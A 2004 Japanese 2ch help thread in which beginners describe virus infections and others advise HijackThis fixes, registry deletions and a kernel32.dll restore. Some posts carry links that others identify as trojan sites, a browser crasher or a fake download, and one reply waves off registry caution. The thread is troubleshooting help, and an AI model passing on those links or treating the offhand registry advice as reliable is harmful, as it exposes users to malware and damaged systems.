O4 - Startup: ごみ箱自動削除ツール.lnk = C:\Program Files\DustDel\DustDel.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - HKLM\..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [MemoryIdle] C:\Program Files\Memory Booster\Memory Booster.exe -PowerOn
O4 - HKLM\..\Run: [INETCONDSP] C:\Program Files\Fujitsu\iNetConDsp\iNetConDsp.exe
O4 - HKLM\..\Run: [BATTERYAID] C:\Program Files\Fujitsu\BATTERYAID\BATTERYAID.exe
O4 - HKLM\..\Run: [YAMAHA AC-XG Power Utility] yacpower.exe
O4 - HKLM\..\Run: [IndicatorUtility] C:\Program Files\Fujitsu\IndicatorUtility\IndicatorUty.exe
O4 - HKLM\..\Run: [WinHandAutoClean] "C:\Program Files\WinHand\AUTOCLN.EXE"
O4 - HKLM\..\Run: [System] C:\WINDOWS\Exploder.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [HDD-Nonクラッシュ] C:\Downloads\hddno132\hddnon.exe
O4 - Startup: ごみ箱自動削除ツール.lnk = C:\Program Files\DustDel\DustDel.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
>>357
被害対策さんの所には相談されましたか?
被害対策さんの所には相談されましたか?
>>358
いえ、まだです
いえ、まだです
360 :ひよこ名無しさん:04/07/23 12:41 ID:a43c28Ez
NullPorce2MX.exeみたいです。
04だけ貼ってもダメだろ。
365 :ひよこ名無しさん:04/07/23 12:55 ID:nMHgKheo
初心者板から来ました
デスクトップにはアイコンもバーも何も表示されず
alt+ctrl+delの新しいタスクからプログラムを起動している状況です
ウイルススキャンには
TROJ/DLOADER.F 一つ
TROJ/AGENT.G 3つ
JS/STARTPAG.AD 4つが検出され、隔離されています
手動で削除する方法がわからないのと、それで解決になるか不安です
解決方法、参考を知っていましたらお願いします
OSはXPです
デスクトップにはアイコンもバーも何も表示されず
alt+ctrl+delの新しいタスクからプログラムを起動している状況です
ウイルススキャンには
TROJ/DLOADER.F 一つ
TROJ/AGENT.G 3つ
JS/STARTPAG.AD 4つが検出され、隔離されています
手動で削除する方法がわからないのと、それで解決になるか不安です
解決方法、参考を知っていましたらお願いします
OSはXPです
エロサイト見たら…助けてください!Part33
http://pc6.2ch.net/test/read.cgi/pcqa/1090357530/l50
から来たのですがどっちも初心者板でした 恥
よろしくお願いします
http://pc6.2ch.net/test/read.cgi/pcqa/1090357530/l50
から来たのですがどっちも初心者板でした 恥
よろしくお願いします
>>365
悪いが どこで聞いても回答者は同じだw
悪いが どこで聞いても回答者は同じだw
>>368
こことマルチしてもいいですから相談してみてください。
こことマルチしてもいいですから相談してみてください。
>>365
気が向いたら報告に来てね。
気が向いたら報告に来てね。
>>357
O4 - HKLM\..\Run: [System] C:\WINDOWS\Exploder.exe
Exploderのスペルに注目してください。明らかに偽者です。
本物はExpolerだし、本来Runには必要ありません。
また下の情報も見てみることもお勧めします。
【警報】Winnyを狙ったワーム・ウイルス情報 Part22
ttp://tmp4.2ch.net/test/read.cgi/download/1089460762/519-520
O4 - HKLM\..\Run: [System] C:\WINDOWS\Exploder.exe
Exploderのスペルに注目してください。明らかに偽者です。
本物はExpolerだし、本来Runには必要ありません。
また下の情報も見てみることもお勧めします。
【警報】Winnyを狙ったワーム・ウイルス情報 Part22
ttp://tmp4.2ch.net/test/read.cgi/download/1089460762/519-520
>>357
ウイルスの治療ですがこれで隔離できるかも知れません。
HijackThis以外を全て閉じて
O4 - HKLM\..\Run: [System] C:\WINDOWS\Exploder.exe
にチェックを入れてFixして再起動してください。
再起動した後はC:\WINDOWS\Exploder.exeを、
リネームしたりゴミ箱に移したりしてみて様子を見ましょう。
状態を見るとトロイ型ぽいので、それで何とかなるかも知れません。
後はウイルス定義が追いついてくるまで静かに待ちましょう。
ウイルスの治療ですがこれで隔離できるかも知れません。
HijackThis以外を全て閉じて
O4 - HKLM\..\Run: [System] C:\WINDOWS\Exploder.exe
にチェックを入れてFixして再起動してください。
再起動した後はC:\WINDOWS\Exploder.exeを、
リネームしたりゴミ箱に移したりしてみて様子を見ましょう。
状態を見るとトロイ型ぽいので、それで何とかなるかも知れません。
後はウイルス定義が追いついてくるまで静かに待ちましょう。
374 :ひよこ名無しさん:04/07/23 14:19 ID:CcqOPtX/
これって安全なファイルですか?
http://pcqa.s3.xrea.com/upload/source/up0100.jpg
http://pcqa.s3.xrea.com/upload/source/up0100.jpg
377 :ひよこ名無しさん:04/07/23 14:31 ID:CcqOPtX/
378 :コマッタチャン:04/07/23 14:43 ID:5W5npSCn
379 :ひよこ名無しさん:04/07/23 14:43 ID:nbisEDiz
PC初心です。
ウイルス感染してしまい、メール受信ができません。
同じメールが何十回も受信されてきます。
ウイルススキャンをしたら、トロイの木馬と書いてあります。
どうしたらよいでしょうか??
昨日から今まで奮闘しても、結局何の解決もしてません。
どうか、教えてください。
ウイルスはフグリ(キャン玉)ウイルスです。
ウイルス感染してしまい、メール受信ができません。
同じメールが何十回も受信されてきます。
ウイルススキャンをしたら、トロイの木馬と書いてあります。
どうしたらよいでしょうか??
昨日から今まで奮闘しても、結局何の解決もしてません。
どうか、教えてください。
ウイルスはフグリ(キャン玉)ウイルスです。
>>379
でもなんでホムペをアーカイブするの?
でもなんでホムペをアーカイブするの?
>>379
ここで釣りするな
ここで釣りするな
>>374
ウィルス+無限ループブラクラ
ウィルス+無限ループブラクラ
最近、ファイルを開いても中身が見えなくなってしまいました、別に中身を消したわけでもなく、ちゃんと存在はしているようなのですが
クリックする対象が見当たりません、さらにスキャンディスクをしようとしてもエラーが出てスキャンが終わりません。
挙句の果てにウイルススキャンも同じように終わりません、誰かおたすけ〜^^;
クリックする対象が見当たりません、さらにスキャンディスクをしようとしてもエラーが出てスキャンが終わりません。
挙句の果てにウイルススキャンも同じように終わりません、誰かおたすけ〜^^;
>>383
窓の手使え。
窓の手使え。
>>383
インストールCD使え
インストールCD使え
380あたりまでなかなか紳士的な流れでしたね。
387 :ひよこ名無しさん:04/07/23 23:33 ID:ag+ekTaV
ウィルス駆除するため
レジストリキーを削除しようとしてるのですが
HKEY_CLASSES_ROOT\CLSID\{486E48B5-ABF2-42BB-A327-2679DF3FB822}
を消去する場合、このフォルダごと消去してもよろしいのでしょうか?
このフォルダに入ってるファイルのみを消去するのでしょうか?
教えてくださいお願いします。
レジストリキーを削除しようとしてるのですが
HKEY_CLASSES_ROOT\CLSID\{486E48B5-ABF2-42BB-A327-2679DF3FB822}
を消去する場合、このフォルダごと消去してもよろしいのでしょうか?
このフォルダに入ってるファイルのみを消去するのでしょうか?
教えてくださいお願いします。
389 :387:04/07/23 23:47 ID:ag+ekTaV
>>388
レスありがとうございます。
最後に確認をしたいのですが(レジストリいじるの本当に怖いので)
まず { の前に ; をつけて異常がないことを確認してから
{486E48B5-ABF2-42BB-A327-2679DF3FB822}
というフォルダを消せばいいのですよね?
レスありがとうございます。
最後に確認をしたいのですが(レジストリいじるの本当に怖いので)
まず { の前に ; をつけて異常がないことを確認してから
{486E48B5-ABF2-42BB-A327-2679DF3FB822}
というフォルダを消せばいいのですよね?
レジストリキーの扱いには十分注意しましょう!
ベンダーサイトのウィルス感染時の処置で必ずこの一行があるけど、
実際には、いじるレジストリの場所が問題であって、多くの場合間違ったって、起動不能になんて陥りませんよ。
びくびくしながら、ガンガンやっちゃって下さい。
そのうちに、こんなもんなのかと実感するでしょう。
でも本当のことを言うと、レジストリのバックアップを定期的に取らないのは、間違っていますからね。
やり方覚えてください。.regファイルの書き出しではないですよ。
ベンダーサイトのウィルス感染時の処置で必ずこの一行があるけど、
実際には、いじるレジストリの場所が問題であって、多くの場合間違ったって、起動不能になんて陥りませんよ。
びくびくしながら、ガンガンやっちゃって下さい。
そのうちに、こんなもんなのかと実感するでしょう。
でも本当のことを言うと、レジストリのバックアップを定期的に取らないのは、間違っていますからね。
やり方覚えてください。.regファイルの書き出しではないですよ。
393 :ひよこ名無しさん:04/07/24 20:45 ID:0Tfs9N3i
タスクバーに表示されてる「ネットワーク接続アイコン」って
何もしてない時に点滅してるとウイルスにやられてる場合が
あると言いますが・・・1回でも点滅すりゃヤバイって事なんでしょうか?
一応ウイルススキャンとスパイウエアの駆除もして異常は無かったんですが、
ふと気付くとタスクバー点滅してることが結構あるんです。
何もしてない時に点滅してるとウイルスにやられてる場合が
あると言いますが・・・1回でも点滅すりゃヤバイって事なんでしょうか?
一応ウイルススキャンとスパイウエアの駆除もして異常は無かったんですが、
ふと気付くとタスクバー点滅してることが結構あるんです。
>>393
点滅しているのが普通だと思いますけど
点滅しているのが普通だと思いますけど
395 :393:04/07/24 20:54 ID:0Tfs9N3i
そういうもんですか・・・ウイルススキャンって言っても
ソースネクストなんで心配してたんですが、分かりました。
ソースネクストなんで心配してたんですが、分かりました。
>>395
ごみパケットが来ている時には、そうなります
ごみパケットが来ている時には、そうなります
397 :ひよこ名無しさん:04/07/25 02:15 ID:QrgkxDHL
win98使いです。
バスターでウイルススキャンをしたところ
DIAL JAPEXA
というウイルスが検出され、隔離しています。
どういうウイルスかググってもでてきません。
どういうウイルスなのか
どなたかご存知の方いませんか?
バスターでウイルススキャンをしたところ
DIAL JAPEXA
というウイルスが検出され、隔離しています。
どういうウイルスかググってもでてきません。
どういうウイルスなのか
どなたかご存知の方いませんか?
、_人_人_人_人_人_人_人_人_人_人_人_,
、_) (_
_) 夏 厨 警 報 !! (_
_) (
'⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒`
//
ヘ,(゚∀゚)y'^ アーヒャ ヒャ ヒャ ヒャ ヒャ
、 _L_;二;_.j_ , \\
 ̄ ト、~Y~,/| ̄
,|yΛ=スイ|、 アーヒャヒャヒャ _
' | | !;∀Y i| ` /##;〉
|イYト〉イY.| /  ̄
アヒャヒャ レYy'`vレ| ヽ(゚∀゚ )ノ
Vy V' ( 厨)ヘ
ヽ( ゚∀゚)ノ <
(夏 )ヘ
<
、_) (_
_) 夏 厨 警 報 !! (_
_) (
'⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒`
//
ヘ,(゚∀゚)y'^ アーヒャ ヒャ ヒャ ヒャ ヒャ
、 _L_;二;_.j_ , \\
 ̄ ト、~Y~,/| ̄
,|yΛ=スイ|、 アーヒャヒャヒャ _
' | | !;∀Y i| ` /##;〉
|イYト〉イY.| /  ̄
アヒャヒャ レYy'`vレ| ヽ(゚∀゚ )ノ
Vy V' ( 厨)ヘ
ヽ( ゚∀゚)ノ <
(夏 )ヘ
<
>>397
たぶん接続先改変
たぶん接続先改変
400 :ひよこ名無しさん:04/07/25 02:22 ID:QrgkxDHL
401 :ひよこ名無しさん:04/07/25 09:50 ID:c4vFKnNn
TVの実況板開く度にunix.penguinてのがノートンで警告くるんですが気にする必要ないですか?
>>401
放っておけ。
放っておけ。
404 :ひよこ名無しさん:04/07/25 12:57 ID:SrT90uwR
ttp://www.albinoblacksheep.com/flash/open.html
ここを誤って開いてしまいましたが、ウィルスツール(AVG)が反応して、吃驚したんですが、感染してしまったらどう対処すればいいのでしょうか
ここを誤って開いてしまいましたが、ウィルスツール(AVG)が反応して、吃驚したんですが、感染してしまったらどう対処すればいいのでしょうか
>>404
■アダルトサイトは安全?危険?
http://www.geocities.jp/kazu1994_jp/bura.html
えっと驚く前に―国際電話・Q2からの事前防御策―
http://www.coolce.com/web/kongbu.htm
アダルトサイト被害対策の部屋
http://higaitaisaku.web.infoseek.co.jp/caution.html
■アダルトサイトは安全?危険?
http://www.geocities.jp/kazu1994_jp/bura.html
えっと驚く前に―国際電話・Q2からの事前防御策―
http://www.coolce.com/web/kongbu.htm
アダルトサイト被害対策の部屋
http://higaitaisaku.web.infoseek.co.jp/caution.html
|┃三 人 _____________
|┃ (_ ) /
|┃ ≡ (__) < >>406 ブラクラ貼るな、蛆虫、氏ね!
____.|ミ\__( ・∀・) \
|┃=__ \  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|┃ ≡ ) 人 \ ガラッ
|┃ (_ ) /
|┃ ≡ (__) < >>406 ブラクラ貼るな、蛆虫、氏ね!
____.|ミ\__( ・∀・) \
|┃=__ \  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|┃ ≡ ) 人 \ ガラッ
>>404
AVGが対応していて反応したものだと思われるが、
「You are an idiot!」ならただのブラクラだから、
インターネットオプション > ファイルの削除 >すべてのにチェック
で削除してIEのキャッシュをクリアーすれば大丈夫のはず。
AVGが対応していて反応したものだと思われるが、
「You are an idiot!」ならただのブラクラだから、
インターネットオプション > ファイルの削除 >すべてのにチェック
で削除してIEのキャッシュをクリアーすれば大丈夫のはず。
あの、すいません。2〜3日前にブラクラを踏んだらしく、
JS/STARTPAG.AD が10個ほど検出されるようになりました。
隔離して削除してもすぐに復活して手の施しようがないのですが・・・
それと、デスクトップのアイコンは表示されますが、フォルダを開くと中身のファイルの、
アイコンは表示されません。起動も5〜6回に一度しか安定しません。
JS/STARTPAG.ADの削除の仕方を教えてください。お願いします。
JS/STARTPAG.AD が10個ほど検出されるようになりました。
隔離して削除してもすぐに復活して手の施しようがないのですが・・・
それと、デスクトップのアイコンは表示されますが、フォルダを開くと中身のファイルの、
アイコンは表示されません。起動も5〜6回に一度しか安定しません。
JS/STARTPAG.ADの削除の仕方を教えてください。お願いします。
411 :ひよこ名無しさん:04/07/25 23:48 ID:TB8MEdG6
すいません、Windows98です。
今トレンドマイクロでオンラインスキャンした所、
VBS_REDLOF.Aというウイルスが87個みつかりました。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A
↑の感染していた場合の対処、のところに
レジストリエディタなどを使って
レジストリ値、レジストリキーを削除するとあるのですが、
これはどうやればできるんでしょうか…
「レジストリエディタ」はどうやれば使えるんでしょうか。
今トレンドマイクロでオンラインスキャンした所、
VBS_REDLOF.Aというウイルスが87個みつかりました。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A
↑の感染していた場合の対処、のところに
レジストリエディタなどを使って
レジストリ値、レジストリキーを削除するとあるのですが、
これはどうやればできるんでしょうか…
「レジストリエディタ」はどうやれば使えるんでしょうか。
412 :ひよこ名無しさん:04/07/25 23:52 ID:GYC7f1xP
>>88にもでてましたが、VBS.Internalに感染してしまいました。
最初は誤反応かと思っていたのですが、ローカルのhtmlファイルのアイコンがすべてIEのマークじゃなくなってしまいました。
感染ファイルはノートン先生が削除してくれたのですが、上記の現象を解決するにはどうしたらいいのでしょうか?
最初は誤反応かと思っていたのですが、ローカルのhtmlファイルのアイコンがすべてIEのマークじゃなくなってしまいました。
感染ファイルはノートン先生が削除してくれたのですが、上記の現象を解決するにはどうしたらいいのでしょうか?
>>411
http://higaitaisaku.web.infoseek.co.jp/regedit.html
レジストリエディタ(regedit)の使い方
でも、REDLOF にやられたら、データをバックアップしてリカバリしたほうがいいかも。
http://higaitaisaku.web.infoseek.co.jp/regedit.html
レジストリエディタ(regedit)の使い方
でも、REDLOF にやられたら、データをバックアップしてリカバリしたほうがいいかも。
>>411
最悪かもな
どうしようもない場合は、CDのcabsフォルダか、windows\options\cabsフォルダから、
kernel32.dllをwindows\system内に復元しなければならない。
起動出来るのなら、フロッピーにでもコピーして
MS-DOSモードで復元してやればいい。
最悪かもな
どうしようもない場合は、CDのcabsフォルダか、windows\options\cabsフォルダから、
kernel32.dllをwindows\system内に復元しなければならない。
起動出来るのなら、フロッピーにでもコピーして
MS-DOSモードで復元してやればいい。
>>414
早速のレス有難うございます。
>htmlのファイルは「e」マークでいいんですよ
その「e」マークが表示されないのです(泣
ファイルを開くプログラムを選択していないときにでるアイコンのままです。
IEで常に開くように指定しても表示がかわらない状態です。。
早速のレス有難うございます。
>htmlのファイルは「e」マークでいいんですよ
その「e」マークが表示されないのです(泣
ファイルを開くプログラムを選択していないときにでるアイコンのままです。
IEで常に開くように指定しても表示がかわらない状態です。。
>>416
htmlの関連付けがおかしいのでは?
htmlの関連付けがおかしいのでは?
>>416
質問者は、メール欄を空欄にしてIDを出してください。
OSは何ですか。
フォルダの「ツール」メニュー「フォルダオプション」の
「ファイルの種類」で、HTMLの「詳細設定」でアイコンの設定を確認。
一度セーフモードで起動するなど、アイコンキャッシュのクリア
質問者は、メール欄を空欄にしてIDを出してください。
OSは何ですか。
フォルダの「ツール」メニュー「フォルダオプション」の
「ファイルの種類」で、HTMLの「詳細設定」でアイコンの設定を確認。
一度セーフモードで起動するなど、アイコンキャッシュのクリア
419 :411:04/07/26 00:17 ID:zFJ+90QL
>>413
レスありがとうございます。
とりあえず、そこを参考にしてやってみます。
>>415
レスありがとうございます。
とりあえず上の方法でやってみます…。
それは「CDのcabsフォルダか、windows\options\cabsフォルダ」に書いてある
「kernel32.dll」というレジストリキーをレジストリエディタで見て、フロッピーかなんかにコピーして、
windows\systemという所(レジストリ)に書きこむということですか?
その作業がMS-DOSモードでないとできない。ということですか?
レスありがとうございます。
とりあえず、そこを参考にしてやってみます。
>>415
レスありがとうございます。
とりあえず上の方法でやってみます…。
それは「CDのcabsフォルダか、windows\options\cabsフォルダ」に書いてある
「kernel32.dll」というレジストリキーをレジストリエディタで見て、フロッピーかなんかにコピーして、
windows\systemという所(レジストリ)に書きこむということですか?
その作業がMS-DOSモードでないとできない。ということですか?
>>417
>>418
レス有難うございます。
OSはXP HomeEditionです。
htmlの関連付けはブラウザがSleipnirをつかっていましてそれにしています。
一応IE、元に戻すにしてみたのですが、アイコンは変わらずです。。
>>418
レス有難うございます。
OSはXP HomeEditionです。
htmlの関連付けはブラウザがSleipnirをつかっていましてそれにしています。
一応IE、元に戻すにしてみたのですが、アイコンは変わらずです。。
>>421
アイコンをクリックすると普通に開くの?
アイコンをクリックすると普通に開くの?
すみませんID非表示のままでした。
>>419
インストールCDの場合
CDのcabsフォルダの中にkernel32.dllというファイルがある
メーカー製リカバリーディスクの場合
windows\options\cabsフォルダの中にkernel32.dllというファイルがある
extractで展開するのは難しいだろうから、explorerで開いてみる
そして、ファイルが見つかったら、フロッピーディスクにコピーする
MS-DOSで
copy a:\kernel32.dll c:\windows\system32\kernel32.dll
インストールCDの場合
CDのcabsフォルダの中にkernel32.dllというファイルがある
メーカー製リカバリーディスクの場合
windows\options\cabsフォルダの中にkernel32.dllというファイルがある
extractで展開するのは難しいだろうから、explorerで開いてみる
そして、ファイルが見つかったら、フロッピーディスクにコピーする
MS-DOSで
copy a:\kernel32.dll c:\windows\system32\kernel32.dll
訂正 間違った
MS-DOSで
copy a:\kernel32.dll c:\windows\system\kernel32.dll
MS-DOSで
copy a:\kernel32.dll c:\windows\system\kernel32.dll
427 :419:04/07/26 00:41 ID:zFJ+90QL
>>420
レスありがとうございます。
わかりました。
>>424
レスありがとうございます。
印刷しておきます。
メーカー製PCなので
「メーカー製リカバリーディスクの場合
windows\options\cabsフォルダの中にkernel32.dllというファイルがある 。」の方かな。
正直に言うとMS-DOSモードがなんなのか全く知らないんですが…
Windowsセーフモードみたいなものでしょうか…
>>425
レスありがとうございます。
印刷しておきます。
レスありがとうございます。
わかりました。
>>424
レスありがとうございます。
印刷しておきます。
メーカー製PCなので
「メーカー製リカバリーディスクの場合
windows\options\cabsフォルダの中にkernel32.dllというファイルがある 。」の方かな。
正直に言うとMS-DOSモードがなんなのか全く知らないんですが…
Windowsセーフモードみたいなものでしょうか…
>>425
レスありがとうございます。
印刷しておきます。
>>422
ファイルは普通に見れます。
ファイルは普通に見れます。
>>427
【Windows 95・98にてMS-DOSモードで起動するには】
Windows Startup Menu (起動メニュー) で[Command Prompt Only]を選択してください。
【Windows 95・98にてMS-DOSモードで起動するには】
Windows Startup Menu (起動メニュー) で[Command Prompt Only]を選択してください。
>>428
それこそ窓の手で直らない?
それこそ窓の手で直らない?
431 :412:04/07/26 00:48 ID:ErzMEsQX
432 :411=419=427:04/07/26 00:53 ID:zFJ+90QL
>>426
訂正ありがとうございます。
印刷しておきます。
>>429
レスありがとうございます。
印刷しておきます。
なるほど、セーフモードの時と同じようにF8を押して軌道メニューに入り、
そこでSafemodeじゃなく「Command Prompt Only」をおせばばいいいのか。
Windows98の終了メニューの一番下に「MS-DOSモードで再起動する」という選択があるんですが。
そこでもだいじょうぶですよね。
Command Prompt Onlyということは「PCの操作を全部コマンドを打ちこんでやっていくようなモード」
ということですか?
問題の個所までたどりつけるだろうか…
訂正ありがとうございます。
印刷しておきます。
>>429
レスありがとうございます。
印刷しておきます。
なるほど、セーフモードの時と同じようにF8を押して軌道メニューに入り、
そこでSafemodeじゃなく「Command Prompt Only」をおせばばいいいのか。
Windows98の終了メニューの一番下に「MS-DOSモードで再起動する」という選択があるんですが。
そこでもだいじょうぶですよね。
Command Prompt Onlyということは「PCの操作を全部コマンドを打ちこんでやっていくようなモード」
ということですか?
問題の個所までたどりつけるだろうか…
433 :ひよこ名無しさん:04/07/26 00:58 ID:DvR64oDd
147 名前:就職戦線異状名無しさん 投稿日:04/07/24 01:04
http://x.full-tgp.net/?ms.com
何かコレ読んだら、アパレルの実体がわかったみたいで
すげー怖くなった・・・・
お前らどう思う?
↑上のウイルスにひっかかりました。
トロイらしいんですがこのウイルスはどういったないようのウイルスなんでしょうか?
対策も教えてください。お願いしますm(_ _)m
>>433
直リンして被害増やしたいのか?死ねよ。
直リンして被害増やしたいのか?死ねよ。
435 :ひよこ名無しさん:04/07/26 01:02 ID:DvR64oDd
>>435
別に直リンする必要ないだろ?
別に直リンする必要ないだろ?
437 :ひよこ名無しさん:04/07/26 01:05 ID:DvR64oDd
>>436
すいませんでしたm(_ _)m
すいませんでしたm(_ _)m
439 :433:04/07/26 01:07 ID:DvR64oDd
>>432
>Windows98の終了メニューの一番下に「MS-DOSモードで再起動する」という選択があるんですが。
>そこでもだいじょうぶですよね。
OK
424さんが>>426で書いてくれてる通りに打ち込んでけば大丈夫
スペースとかに気をつけて
>>433
踏んで調べろとでも?
アンチウィルスソフト入ってないならオンラインスキャンしろよ
>Windows98の終了メニューの一番下に「MS-DOSモードで再起動する」という選択があるんですが。
>そこでもだいじょうぶですよね。
OK
424さんが>>426で書いてくれてる通りに打ち込んでけば大丈夫
スペースとかに気をつけて
>>433
踏んで調べろとでも?
アンチウィルスソフト入ってないならオンラインスキャンしろよ
>>439
スキャンしろと書いてあるべ
スキャンしろと書いてあるべ
442 :433:04/07/26 01:10 ID:DvR64oDd
>>433
わざとか? 5連発位だな
Iframe系のトロイは、過去のセキュリティホールを突いてくるスクリプトを含んでいる。
通常パッチを当てていれば感染しないのだが、まれに一つ二つ無断でインストールされる事がある。
大抵は常駐シールドで遮断してくれるのだが、世の中広いからねえ。
わざとか? 5連発位だな
Iframe系のトロイは、過去のセキュリティホールを突いてくるスクリプトを含んでいる。
通常パッチを当てていれば感染しないのだが、まれに一つ二つ無断でインストールされる事がある。
大抵は常駐シールドで遮断してくれるのだが、世の中広いからねえ。
>>442
ウィルス定義ファイルは最新か?
ソースネクストのは安いからそうしたんだろうが、余り評判よくないね。
検索されなかったらトレンドマイクロかシマンテックのオンラインスキャンも試せ。
でてこなけりゃそれはそれでいいが、スパイウェアも疑うと万全。
とりあえず、検索結果待ちな。
ウィルス定義ファイルは最新か?
ソースネクストのは安いからそうしたんだろうが、余り評判よくないね。
検索されなかったらトレンドマイクロかシマンテックのオンラインスキャンも試せ。
でてこなけりゃそれはそれでいいが、スパイウェアも疑うと万全。
とりあえず、検索結果待ちな。
445 :433:04/07/26 01:14 ID:DvR64oDd
>>443
タグがたくさんでてきそうになって、
このプログラムを許可しますか?っていうファイアウォールのあれがでて
一応ブロックするにしてすぐ回線切ったんですが・・・
4ヶ月くらいアップデートしていないウイルススキャンで調べてるんですが
これでウイルス検出されなかったら大丈夫ですかね?
タグがたくさんでてきそうになって、
このプログラムを許可しますか?っていうファイアウォールのあれがでて
一応ブロックするにしてすぐ回線切ったんですが・・・
4ヶ月くらいアップデートしていないウイルススキャンで調べてるんですが
これでウイルス検出されなかったら大丈夫ですかね?
446 :433:04/07/26 01:15 ID:DvR64oDd
448 :411=419=427=432:04/07/26 01:20 ID:zFJ+90QL
>>440
レスありがとうございます。
印刷しておきます。
>424さんが>>426で書いてくれてる通りに打ち込んでけば大丈夫
>スペースとかに気をつけて
わかりました。
がんばってレジストリを見ます。
質問に答えてくれた方本当にありがとうございました。
レスありがとうございます。
印刷しておきます。
>424さんが>>426で書いてくれてる通りに打ち込んでけば大丈夫
>スペースとかに気をつけて
わかりました。
がんばってレジストリを見ます。
質問に答えてくれた方本当にありがとうございました。
449 :433:04/07/26 01:29 ID:DvR64oDd
うんこ
>>449
ちょっと、ダウンロード先がややこしいので
わけわかめになっている人は、このリンクからダウンロードして下さい
SPYBOT
http://www.download.com/3000-2144-10122137.html?part=104443&subj=dlpage&tag=button
Ad-aware
http://www.download.com/3000-2144-10045910.html?part=69274&subj=dlpage&tag=button
ちょっと、ダウンロード先がややこしいので
わけわかめになっている人は、このリンクからダウンロードして下さい
SPYBOT
http://www.download.com/3000-2144-10122137.html?part=104443&subj=dlpage&tag=button
Ad-aware
http://www.download.com/3000-2144-10045910.html?part=69274&subj=dlpage&tag=button
>>451 偽リンク踏むな
453 :411=419=427=432=448:04/07/26 01:59 ID:zFJ+90QL
ん…?なんかおかしい。
トレンドマイクロのサイトで言われたものを削除しようとしたんですが、
↓のようなレジストリの値はないみたいなんですが…
検索してもありませんでした。
1) Windowsのレジストリエディタ(regedit.exe)などを使用して以下のレジストリ値を削除してください:
場所: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
値:Kernel32="<Windowsシステムディレクトリ>\Kernel.dll"
2) 以下のレジストリキーを削除してください:
HKEY_CLASSES_ROOT\dllfile\Shell
HKEY_CLASSES_ROOT\dllfile\ScriptEngine
HKEY_CLASSES_ROOT\dllfile\ShellEx
HKEY_CLASSES_ROOT\dllfile\ScriptHostEncode
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersionの次には「run」しかみあたらず、
それの中にも上のような値はないし。
HKEY_CLASSES_ROOTの次には「dll」しかみあたらなくて、
その中にも上のような値はありません…
トレンドマイクロのサイトで言われたものを削除しようとしたんですが、
↓のようなレジストリの値はないみたいなんですが…
検索してもありませんでした。
1) Windowsのレジストリエディタ(regedit.exe)などを使用して以下のレジストリ値を削除してください:
場所: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
値:Kernel32="<Windowsシステムディレクトリ>\Kernel.dll"
2) 以下のレジストリキーを削除してください:
HKEY_CLASSES_ROOT\dllfile\Shell
HKEY_CLASSES_ROOT\dllfile\ScriptEngine
HKEY_CLASSES_ROOT\dllfile\ShellEx
HKEY_CLASSES_ROOT\dllfile\ScriptHostEncode
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersionの次には「run」しかみあたらず、
それの中にも上のような値はないし。
HKEY_CLASSES_ROOTの次には「dll」しかみあたらなくて、
その中にも上のような値はありません…
>>451はウイルス
>>453
ん、右側に展開されているキーとその値の中になかった?
もしないとすると、感染ファイルだけが存在しているのかもしれない。
運が良ければ、まだ発病していないかもしれない。
発見されたのが、Temporary Internet Filesの中だったら、
インターネットオプションから全部削除してよし。
ん、右側に展開されているキーとその値の中になかった?
もしないとすると、感染ファイルだけが存在しているのかもしれない。
運が良ければ、まだ発病していないかもしれない。
発見されたのが、Temporary Internet Filesの中だったら、
インターネットオプションから全部削除してよし。
456 :ひよこ名無しさん:04/07/26 02:49 ID:FDUxCpwm
すいませんパソコンがおかしいんですけど・・・
ウイルスっぽいです・・
ウイルスっぽいです・・
457 :411=419=427=432=448=453:04/07/26 02:54 ID:UVBGSu1s
>>455
こんな夜更けににもかかわらずレスありがとうございます。
削除に夢中になっていて、レスが遅れてすいません。
>>453 を書いてからトレンドマイクロで「感染してるぞ」と言われたファイルを1つ1つごみ箱にうつして捨てました。
87個感染ファイルが見つかったんですが、1つ(C\WINDOWS\SYSTEM\Kernel.dll)以外はなんとか削除できたようです。
しかしこの C\WINDOWS\SYSTEM\Kernel.dll は削除してはいけないんですよね。
でもレジストリの感染した値は見つからないし…どうしよう…
あと、削除していて FOLDER.HTTという名前のファイル や 変なhtmlファイル が、フォルダの1つ1つに入りこんでいる
パターンが多かったんですが、その FOLDER.HTT がまだコンピュータ内にちらほら存在していて怖いです。
こんなの感染する前はなかったし…でも表示されなかったし…
ウイルスと同時期に出てきたdesktopとかいうテキストファイルも不気味だ。FOLDER.HTTと必ず一緒にあったし…
こんな夜更けににもかかわらずレスありがとうございます。
削除に夢中になっていて、レスが遅れてすいません。
>>453 を書いてからトレンドマイクロで「感染してるぞ」と言われたファイルを1つ1つごみ箱にうつして捨てました。
87個感染ファイルが見つかったんですが、1つ(C\WINDOWS\SYSTEM\Kernel.dll)以外はなんとか削除できたようです。
